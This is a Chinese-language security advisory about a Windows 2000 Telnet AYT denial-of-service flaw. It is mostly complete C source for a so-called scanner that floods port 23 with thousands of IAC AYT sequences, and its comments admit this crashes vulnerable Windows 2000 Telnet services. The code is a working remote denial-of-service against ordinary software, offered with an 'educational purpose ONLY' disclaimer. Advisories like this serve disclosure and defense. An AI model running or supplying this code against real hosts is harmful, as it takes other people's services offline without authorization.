Windows 2000 TELNET 存在拒绝服务攻击发布时间:2001-07-27 更新时间:2001-07-27 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 W2K详细描述 WINDOWS的TELNET存在AYT漏洞,可造成拒绝服务攻击。 测试代码 /* * Telnetd AYT overflow scanner, by Security Point(R) * Bug found by scut of TESO Security * * Date: 25/07/01 * Author: Security Point(R) * WWW: http://www.secpoint.com * Email: info@secpoint.com * * This program checks for the AYT overflow related to the * newly discovered telnetd vulnerabilities. * * Tested against: * Vulnerable: * netkit-telnet-0.10 * FreeBSD 4.2 * Windows 2000 Service Pack2 Telnet service will * crash when scanned. * Not vulnerable: * netkit-telnet-0.17 * * * * Please keep us updated with the OS's that you check, and * report back to us on info@secpoint.com, weather the system * is vulnerable or not. So we can construct a full list * of vulnerable systems. * * * This source code is for educational purpose ONLY, * Security Point(R) will not be responsible for any damages * whatsoever that have a connection with this code. There are * no warranties with regard to this information. * * Are your networks under attack at this moment? * * With Security Point(R) Scanner you can find and repair the * Vulnerabilities before the bad guys get in. * * Please see http://www.secpoint.com/solutions.php * */ #include <stdio.h> #include <stdlib.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <signal.h> #include <unistd.h> #include <sys/socket.h> struct in_addr addr; struct sockaddr_in address; struct hostent *host; int sock; char sendbuffer[5120*2]; char buffer[5120*2]; int i; int timeout; void handle_alarm(int signum) { alarm(0); timeout=1; } int main (int argc, char *argv[]) { printf("Telnetd AYT overflow scanner, by Security Point(R)\n"); if (argc!=2) { printf("Usage: %s <host>\n", argv[0]); exit(EXIT_FAILURE); } printf("Host: %s\n", argv[1]); if ((host=gethostbyname(argv[1])) == NULL) { perror("gethostbyname"); exit(0); exit(EXIT_FAILURE); } if (( sock = socket(AF_INET, SOCK_STREAM,0)) < 0) { perror("socket"); exit(EXIT_FAILURE); } bcopy(host->h_addr, (char *)&address.sin_addr, host->h_length); address.sin_family=AF_INET; address.sin_port = htons(23); // telnet if (connect(sock, (struct sockaddr*)&address, sizeof(address)) < 0) { perror("connect"); exit(EXIT_FAILURE); } printf("Connected to remote host...\n",argv[1]); printf("Sending telnet options... stand by...\n"); signal(SIGALRM,handle_alarm); bzero(sendbuffer,sizeof(sendbuffer)); for (i=0;i!=(sizeof(sendbuffer)/2);i++) { sprintf(sendbuffer,"%s%c%c",sendbuffer,255,246); // 0xff 0xf6 - IAC AYT } alarm(60); read(sock, buffer, sizeof(buffer)); alarm(0); write(sock, sendbuffer, strlen(sendbuffer)); bzero(buffer,sizeof(buffer)); alarm(60); if (read(sock, buffer, sizeof(buffer)) <=0) { printf("Telnetd on %s vulnerable\n",argv[1]); exit(EXIT_SUCCESS); } alarm(0); printf("Telnetd on %s not vulnerable\n",argv[1]); exit(EXIT_SUCCESS); } 解决方案 关闭服务 相关信息 |
